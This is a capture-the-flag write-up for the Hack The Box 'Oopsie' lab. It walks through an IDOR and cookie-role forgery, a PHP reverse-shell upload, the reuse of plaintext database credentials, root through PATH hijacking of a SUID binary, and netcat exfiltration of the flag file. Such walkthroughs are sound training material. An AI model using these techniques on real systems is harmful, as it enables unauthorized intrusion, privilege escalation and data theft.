Oopsie Walkthrough

After the Archetype Walkthrough, here i'm with Oopsie box. Let's hack and grab the flags.

In ours pervious Archetype Walkthrough, I mentioned that the starting point machines are a series of 9 easily rated machines that should be rooted in a sequence. So it means, if you need to go through this box, you must have a complete Archetype machine.

Enough talks 🥱, let's start to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, Just click "Join Machine".

Then you can see the IP address for that machine. usually it is 10.10.10.28 🤠

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success!

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# ping 10.10.10.28 -c 2
PING 10.10.10.28 (10.10.10.28) 56(84) bytes of data.
64 bytes from 10.10.10.28: icmp_seq=1 ttl=63 time=268 ms
64 bytes from 10.10.10.28: icmp_seq=2 ttl=63 time=282 ms

--- 10.10.10.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 267.817/274.911/282.006/7.094 ms

As a ping result, It's TTL=63. There is one route between machine and us (VPN) so it's definitely it will be Linux machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open. 

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output 👇

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:28 EDT
Initiating Ping Scan at 05:28
Scanning 10.10.10.28 [4 ports]
Completed Ping Scan at 05:28, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:28
Scanning 10.10.10.28 [65535 ports]
Discovered open port 80/tcp on 10.10.10.28
Discovered open port 22/tcp on 10.10.10.28
SYN Stealth Scan Timing: About 31.38% done; ETC: 05:29 (0:01:08 remaining)
Completed SYN Stealth Scan at 05:30, 108.95s elapsed (65535 total ports)
Nmap scan report for 10.10.10.28
Host is up, received echo-reply ttl 63 (0.32s latency).
Scanned at 2021-04-16 05:28:18 EDT for 109s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63           * (Interesting)
80/tcp open  http    syn-ack ttl 63           * (Interesting)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 109.41 seconds
           Raw packets sent: 93007 (4.092MB) | Rcvd: 92692 (3.708MB)

Now we know which ports are open, Here we can see some * (Interesting) ports.

01.2 Run Nmap Scripting Engine

To get the best result we can run the Nmap Scripting Engine for all open ports. Now we know all the open ports. So we can point out and run the script engine as fast as possible. 

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 22,80 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:33 EDT
Nmap scan report for 10.10.10.28
Host is up (0.39s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds

I have some trick to identify the Operating System using SSH version. I got it from IppSec's walkthroughs. Thanks IppSec for your valuable walkthroughs 🙏. Here is the trick. If you see the SSH version like "OpenSSH 7.6p1 Ubuntu 4ubuntu0.3" just copy it and search through google. In the search results you can find domain called launchpad.net. It contains some important details like Ubuntu Releases, last update, publishing details and more important is builds. Likewise, in this case it is Bionic.

Now we know the operating system is Ubuntu and we have open ports 22 (SSH) and 80 (HTTP). Let's go to the port 80 first.

01.3 Discover more on port 80

Open web browser and Burp Suite. Type http://10.10.10.28/

Here we got a nice landing page. First thing first; view source code and look if we have any interesting things. Unfortunately, nothing interesting found. Then we can see the traffic on burp.

In here, you can find some endpoint, so let's jump into it.

But I got nothing, it's just a blank page. Hmm, what about "http://10.10.10.28/cdn-cgi/login/" ah, let's check...

It contains a login page. lets check basic default username password like,

  • admin : admin

  • admin : admin123

  • admin : password

  • admin : pa$$w0rd

Nothing worked.😢 Oh wait, wait.. Do you remember we got some password at the end of Archetype machine? Try to remember, it was "MEGACORP_4dm1n!!". Let's check this one as well.

admin : MEGACORP_4dm1n!!

We got our admin panel. and now it's time to check page source. so let's check page source.

Here we have some interesting links. let's check one-by-one.

In upload section they say "if you need to upload anything, please be a superadmin !". hmm ok let's check other ones.

Oh!, now I smell some IDOR vulnerability. Isn't it ?? Let's check ..

I send this request to burp intruder and change settings like below 👇

Let's start the attack.

Above I sorted the output result by the length, There are more users and now I got a super admin Access ID and Email. So let's jump back to the upload section again. But now we intercept the web traffic through burp proxy.

When you refresh the page you can see the cookie contain something like user id and role. so let's alter those values by super admin and then click forward the traffic.

I was done this using match and replace method on burp. it will be more quick rather than intercept request one by one.

02. Foothold

Let's bump to the upload page, and now it accessible.

Let's check whether we can upload PHP web shell or what kind of file type are they need to be uploaded. First copy the PHP Reverse shell to our current directory. 

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .

Then we can open that php-reverse-shell.php whatever text editor you like and edit the below changes. 👇

And I rename that file to hiddenwiki.php. Let's upload the file.

Note : You must change the cookie to super admin do upload the file. but in my case it is auto replace by burp match and replace.

File has been uploaded, Now we need to find where the file is.

We have lots of fuzzing tools, but I personally love Mauro Soria's Dirsearch tool. it has amazing output and also can customize the script because it was written using python3. For the wordlist I used Daniel Miessler's SecLists.

Now power up the dirsearch tool and wait for the results.

dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

From the beginning of the results we got directory called uploads. 

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# /opt/dirsearch/dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt                                                                              1 ⨯

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js, txt, xhtml | HTTP method: GET | Threads: 30 | Wordlist size: 560493

Error Log: /opt/dirsearch/logs/errors-21-04-16_09-31-10.log

Target: http://10.10.10.28/

Output File: /opt/dirsearch/reports/10.10.10.28/_21-04-16_09-31-11.txt

[09:31:11] Starting:
[09:31:16] 403 -  276B  - /js/     (Added to queue)
[09:31:16] 301 -  307B  - /js  ->  http://10.10.10.28/js/
[09:31:17] 403 -  276B  - /images/     (Added to queue)
[09:31:17] 403 -  276B  - /css/     (Added to queue)
[09:31:17] 301 -  308B  - /css  ->  http://10.10.10.28/css/
[09:31:18] 301 -  311B  - /images  ->  http://10.10.10.28/images/
[09:31:18] 301 -  311B  - /themes  ->  http://10.10.10.28/themes/     (Added to queue)
[09:31:18] 403 -  276B  - /themes/
[09:31:22] 301 -  312B  - /uploads  ->  http://10.10.10.28/uploads/     (Added to queue)
[09:31:22] 403 -  276B  - /uploads/
[09:31:37] 200 -   11KB - /index.php
[09:31:40] 403 -  276B  - /fonts/     (Added to queue)
[09:31:40] 301 -  310B  - /fonts  ->  http://10.10.10.28/fonts/

Now it's time to powerup netcat listener and we can use curl command to fetch the uploaded file. 

┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# curl http://10.10.10.28/uploads/hiddenwiki.php

We land a shell as www-data and proceed to upgrade it. Type below command to spawn our shell 👇 

python3 -c 'import pty;pty.spawn("/bin/bash")'
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.28] 53294
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:18:36 up  5:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ pwd
pwd
/
www-data@oopsie:/$

First check web user directory where it has some interesting information.

www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js

Here we found db.php file in /var/www/html/cdn-cgi/login directory. let's view this file. 

www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

Oh! here we found new user credentials.

  • robert:M3g4C0rpUs3r!

So let’s access Robert’s user, providing the password found. su robert

www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$

Yes it works and now we are in robert user. we can view our user flag now. Let's check and submit it to HTB. 

robert@oopsie:~$ cat user.txt
cat user.txt
f2c74*******************b7981

03. Privilege Escalation

Now we are on the last step. we need to find root flag.

Now we are robert. So again, look around the file system, First we can use id command to verify in which user group we are now. Let's check it.

robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

As above result; we see that this robert is part of a bugtrack group. Now let's check for what files this group has the access.

find / -type f -group bugtracker 2> /dev/null
robert@oopsie:/$ find / -type f -group bugtracker 2> /dev/null
find / -type f -group bugtracker 2> /dev/null
/usr/bin/bugtracker

There is a binary file calledbugtracker and also we notice that it has SUID permissions. 

robert@oopsie:/$ ls -l /usr/bin/bugtracker
ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

The ‘s’ in the user ‘execute’ field, it runs ‘as’ its creator, in this case, root. 😋😋😎

Let's run the file and check what are the mess around that file. 

robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 000
000
---------------

cat: /root/reports/000: No such file or directory

Nothing interesting found. let's check strings command to analyze the binary file for any hard-coded information.

strings /usr/bin/bugtracker

When looking around the output, you can see that it looks like a system command which is calling the cat command using the relative path instead of the absolute path. So what's on your mind now. yes we can create malicious file called cat and modifying the path to include the current working directory. Using that method we can abuse this misconfiguration and escalate our privileges to root.

Let's create the file, make it as executable and add the current working directory to PATH.

cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH

Now let's run the /usr/bin/bugtracker binary again.

Now we are landing as root. The last step; let's check the root flag and submit it to the HTB.

Here I was unable to view the root.txt flag using cat,vi,nano commands. so instead of view the flag, I'm going to use netcat and get that file to my host.

-- On the receiving end (My host)

nc -l -p 7878 > root.txt

-- On the sending end (Oopsie machine)

nc -w 3 destination-ip 7878 < root.txt

Here is the output 👇

04. Post Exploitation

Inside root's folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser : mc@F1l3ZilL4 visible in plain text.

That’s all for now! We’ll keep in mind that some of the info collected (like credentials, folders…) can be useful in the next 7 labs of the ‘Starting Point’ path. Thanks for reading and happy hacking!

Find me on @twitter

PreviousArchetype WalkthroughNextVaccine Walkthrough

Last updated